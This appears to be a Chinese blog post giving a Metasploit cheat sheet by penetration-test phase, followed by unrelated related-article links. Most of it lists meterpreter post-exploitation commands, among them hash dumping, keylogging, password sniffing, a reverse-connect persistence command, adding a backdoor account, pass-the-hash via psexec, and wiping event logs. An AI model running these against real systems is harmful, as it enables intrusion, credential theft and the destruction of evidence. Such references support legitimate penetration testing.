信息收集阶段

Whois信息收集

msf auxiliary > whois baidu.com

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com

msf auxiliary > dig @114.114.114.114 www.baidu.com



主机端口探测阶段

直接使用PING命令探测连通性

ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep

msf > set RHOSTS 1.1.1.0/24

msf > set THREADS 50

msf > run

使用NMAP探测

msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version

ssh服务:use auxiliary/scanner/ssh/telnet_version

Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version

http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login

ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段

那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透

为什么不用burpsuite呢,用burpsuite更好

还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段

选择合适的漏洞利用payload和攻击脚本即可

use xxx

set payload xxx

强大的meterpreter

meterpreter > background 后台运行meterpreter

meterpreter > sessions 列出session,选择交互session的话 使用session -i  x

msterpreter > shell

msterpreter > cat xxxxx 查看文件

msterpreter > getwd/getlwd  获取当下路径

msterpreter > upload xxx.exe c:\  上传文件或文件夹

msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件

msterpreter > edit 使用vi编辑器编辑目标机上的文件

msterpreter > search 搜索目标上的文件

msterpreter > ipconfig 查看网络信息

msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口

msterpreter > route 查看目标机的路由信息

msterpreter > ps  查看进程表

msterpreter > migrate 转移shell到进程

msterpreter > execute -H -f cmd.exe 隐藏执行cmd

msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt"

msterpreter > getpid 获取当前会话所在进程的pid

msterpreter > getuid /whoami 获取自己是谁

msterpreter > sysinfo  查看系统信息

msterpreter > kill 杀掉进程

msterpreter > shutdown关机

msterpreter > hashdump 获取windows 的hash口令

msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141

msterpreter > run metsvc #吧31337端口打开监听meterpreter

msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter

msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc

msterpreter > getsystem 提权

msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档

msterpreter > run post/windows/gather/enum_applications 获取安装的程序

msterpreter > keyscan_start 键盘记录

msterpreter > keyscan_dump

msterpreter > keyscan_stop 关闭

msterpreter > use sniffer #网络监听获取密码

msterpreter > sniffer_interface

msterpreter > sniffer_start 1

msterpreter > sniffer_dump 1 /tmp/xxx.pcap

msterpreter > sniffer_stop 1

msterpreter > run post/windows/gather/enum_ie 浏览器获取密码

msterpreter > run windows/gather/smart_hashdump 获取系统口令

msterpreter > run get_local_subnets 添加路由

msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print

msf > use exploit/windows/smb/psexec

msf > set RHOST RPORT LHOST ...

msf > set SMBPass hash值

msf > exploit

msterpreter > clearev 删除日志

msterpreter >timestomp 停止修改文件属性的时间记录

Metaspolit使用简介的更多相关文章

  1. 关于metaspolit中进行JAVA反序列化渗透RMI的原理分析

    一.背景: 这里需要对java反序列化有点了解,在这里得推广下自己的博客嘛,虽然写的不好,广告还是要做的.原谅我: 1.java反序列化漏洞原理研习 2.java反序列化漏洞的检测 二.攻击手法简介 ...

  2. ASP.NET Core 1.1 简介

    ASP.NET Core 1.1 于2016年11月16日发布.这个版本包括许多伟大的新功能以及许多错误修复和一般的增强.这个版本包含了多个新的中间件组件.针对Windows的WebListener服 ...

  3. MVVM模式和在WPF中的实现(一)MVVM模式简介

    MVVM模式解析和在WPF中的实现(一) MVVM模式简介 系列目录: MVVM模式解析和在WPF中的实现(一)MVVM模式简介 MVVM模式解析和在WPF中的实现(二)数据绑定 MVVM模式解析和在 ...

  4. Cassandra简介

    在前面的一篇文章<图形数据库Neo4J简介>中,我们介绍了一种非常流行的图形数据库Neo4J的使用方法.而在本文中,我们将对另外一种类型的NoSQL数据库——Cassandra进行简单地介 ...

  5. REST简介

    一说到REST,我想大家的第一反应就是“啊,就是那种前后台通信方式.”但是在要求详细讲述它所提出的各个约束,以及如何开始搭建REST服务时,却很少有人能够清晰地说出它到底是什么,需要遵守什么样的准则. ...

  6. Microservice架构模式简介

    在2014年,Sam Newman,Martin Fowler在ThoughtWorks的一位同事,出版了一本新书<Building Microservices>.该书描述了如何按照Mic ...

  7. const,static,extern 简介

    const,static,extern 简介 一.const与宏的区别: const简介:之前常用的字符串常量,一般是抽成宏,但是苹果不推荐我们抽成宏,推荐我们使用const常量. 执行时刻:宏是预编 ...

  8. HTTPS简介

    一.简单总结 1.HTTPS概念总结 HTTPS 就是对HTTP进行了TLS或SSL加密. 应用层的HTTP协议通过传输层的TCP协议来传输,HTTPS 在 HTTP和 TCP中间加了一层TLS/SS ...

  9. 【Machine Learning】机器学习及其基础概念简介

    机器学习及其基础概念简介 作者:白宁超 2016年12月23日21:24:51 摘要:随着机器学习和深度学习的热潮,各种图书层出不穷.然而多数是基础理论知识介绍,缺乏实现的深入理解.本系列文章是作者结 ...

随机推荐

  1. JS性能细节学习初步总结

    1,声明变量要赋初值2,尽量避免声明全局变量,可以减少与系统的重名3,当编写大量js代码时,难免会遇到命名冲突,这是可以通过模拟命名空间方式     来避免冲突4,尽量避免使用全局变量,搜索全局变量是 ...

  2. 大内核锁 BKL

    参考:http://blog.csdn.net/universus/article/details/5623971                                            ...

  3. (第3篇)HDFS是什么?HDFS适合做什么?我们应该怎样操作HDFS系统?

    摘要: 这篇文章会详细介绍HDFS是什么,HDFS的作用,适合和不适合的场景,我们该如何操作HDFS?   HDFS文件系统 Hadoop 附带了一个名为 HDFS(Hadoop分布式文件系统)的分布 ...

  4. QT中C++与Html端通信例子

    C++(服务端)和HTML(客户端)通过websocket通信,通过qwebchannel.js实现 C++ -> HTML,通过信号. HTML -> C++,直接调用函数. Main函 ...

  5. 五步整理你的css文件

    鉴于实在无法忍受那种写一句就换一行的css写法,有个项目中的一个css文件竟然高达6000多行,看着实在蛋疼,无实今天下定决心整理一下,在DW里可以用正则很好的进行替换,步骤如下: 一:\r => ...

  6. js获取图片原始大小

    摘要: 浏览器中显示的图片大小未必是他真实的高和宽,比如像下面这样,我们给他加上宽和高的样式 <img src="IE.png" style="width:25px ...

  7. 一个非常好的C#字符串操作处理类StringHelper.cs

    /// <summary> /// 类说明:Assistant /// 编 码 人:苏飞 /// 联系方式:361983679 /// 更新网站:http://www.sufeinet.c ...

  8. javascript的replace方法的高级应用

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  9. C#中的Abstract、Virtual、Interface理解

    容易混淆是必须的,都是与继承有关系,并且涉及到override的使用 一.Virtual方法(虚方法) virtual 关键字用于在基类中修饰方法.virtual的使用会有两种情况: 情况1:在基类中 ...

  10. wee hours

    前言: 程序员问科比:“你为什么这么成功? ” 科比:“你知道凌晨四点的城市是什么样子吗?” 程序员:“知道,一般那个时候我还在写代码,怎么了?” 科比:“没事了……” 说起程序员,可能很多人脑中会蹦 ...